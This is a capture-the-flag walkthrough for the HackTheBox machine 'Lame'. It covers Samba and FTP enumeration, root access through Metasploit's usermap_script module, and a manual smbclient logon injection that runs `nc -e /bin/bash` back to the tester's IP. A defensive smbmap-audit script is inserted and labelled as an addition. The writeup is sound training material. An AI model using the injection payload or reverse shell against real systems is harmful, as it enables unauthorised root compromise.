HackTheBox Lame Writeup

Enjoy reading my HTB Lame Writeup

HackTheBox Lame Walkthrough

HackTheBox is a popular service that offers CTF-like machines to let infosec professionals improve their current skills or learn new ones. HTB Lame is a machine recommended if you want to take the OSCP exam.

This walkthrough contains two different ways of rooting the machine, one with the help of the Metasploit-framework, the other one without.

Information Gathering

First, let's begin with an nmap scan:

sudo nmap -p 1-5000 -sC -sV -v 10.10.10.3

This gives us the following information:

Let's enumerate the Samba shares using smbmap:

smbmap -H 10.10.10.3

This gives us the following output:

[+] IP: 10.10.10.3:445	Name: 10.10.10.3
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS	
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

We can access the tmp share using smbclient:

smbclient \\\\10.10.10.3\\tmp

but the files on the share do not seem to be interesting or useful.
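As an added defender-side example (not part of the original writeup), here is a small Python script that parses smbmap's table output, lists which shares a null session can read or write, and pulls the Samba version out of the share comments. The sample input is the table above embedded inline; the permission strings matched and the version baseline used for the end-of-life flag are assumptions, so adjust them to your own policy.

```python
import re

# Constructed sample input: the smbmap table from the writeup, embedded so the
# script runs offline. smbmap separates the columns with tabs.
SMBMAP_OUTPUT = """\
[+] IP: 10.10.10.3:445\tName: 10.10.10.3
        Disk\tPermissions\tComment
\t----\t-----------\t-------
\tprint$\tNO ACCESS\tPrinter Drivers
\ttmp\tREAD, WRITE\toh noes!
\topt\tNO ACCESS\t
\tIPC$\tNO ACCESS\tIPC Service (lame server (Samba 3.0.20-Debian))
\tADMIN$\tNO ACCESS\tIPC Service (lame server (Samba 3.0.20-Debian))
"""

# One data row: share name, one of smbmap's permission strings (assumed set), optional comment.
ROW_RE = re.compile(r"^\s*(\S+)\s+(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(.*?)\s*$")
VERSION_RE = re.compile(r"Samba (\d+)\.(\d+)\.(\d+)")

def parse_shares(output):
    """Return [(share, permissions, comment)] for every data row of smbmap output."""
    rows = []
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((m.group(1), m.group(2), m.group(3)))
    return rows

def samba_version(rows):
    """Samba version advertised in a share comment, as an int tuple, or None."""
    for _, _, comment in rows:
        m = VERSION_RE.search(comment)
        if m:
            return tuple(int(x) for x in m.groups())
    return None

def audit(output, min_version=(3, 6, 0)):
    """Summarise what a null-session smbmap run reveals. min_version is an
    assumed baseline (the Samba 3.0.x line is long end-of-life); adjust to policy."""
    rows = parse_shares(output)
    version = samba_version(rows)
    return {
        "anon_writable": [name for name, perms, _ in rows if "WRITE" in perms],
        "anon_readable": [name for name, perms, _ in rows if "READ" in perms],
        "samba_version": version,
        "end_of_life": version is not None and version < min_version,
    }

if __name__ == "__main__":
    print(audit(SMBMAP_OUTPUT))
```

Run against real smbmap output, an anonymously writable share or an unsupported Samba release is exactly what should trigger a ticket, long before anyone reaches the exploitation steps below.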

Next, let's try to enumerate FTP using the anonymous account:

└──╼ $ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:user): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (10,10,10,3,60,72).
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
257 "/"
ftp> 

But there is no interesting information here either.


Pwning the machine using Metasploit

First, start Metasploit with msfconsole.

Now you can search for an exploit that matches the running version of Samba:

search Samba 3.0.20

Now load the exploit with either use 0 or use exploit/multi/samba/usermap_script.

Configure the options:

set RHOSTS 10.10.10.3
set LHOST 10.10.14.4

and start the attack with run.

You will get a reverse shell with root privileges.

Now you can read the root flag in /root/. To locate the user flag you can use find / -name user.txt -type f 2>/dev/null.


Pwn without Metasploit

To gain root access without the help of Metasploit, connect to the tmp share using smbclient.

Then start a netcat listener (nc -lvnp 4545) and abuse the logon command of smbclient to exploit the machine.

For my exploit, I took a piece of code from this Ruby script.

To be more specific, this was my final exploit for HackTheBox Lame:

/=`nohup nc -e /bin/bash 10.10.14.4 4545 `"

which I used together with the logon command:

logon /=`nohup nc -e /bin/bash 10.10.14.4 4545 `"

This spawned a shell with root privileges.

The root flag is located in /root and the user flag can be found with find / -name user.txt -type f 2>/dev/null.


Tags:

htb, lame, hackthebox, samba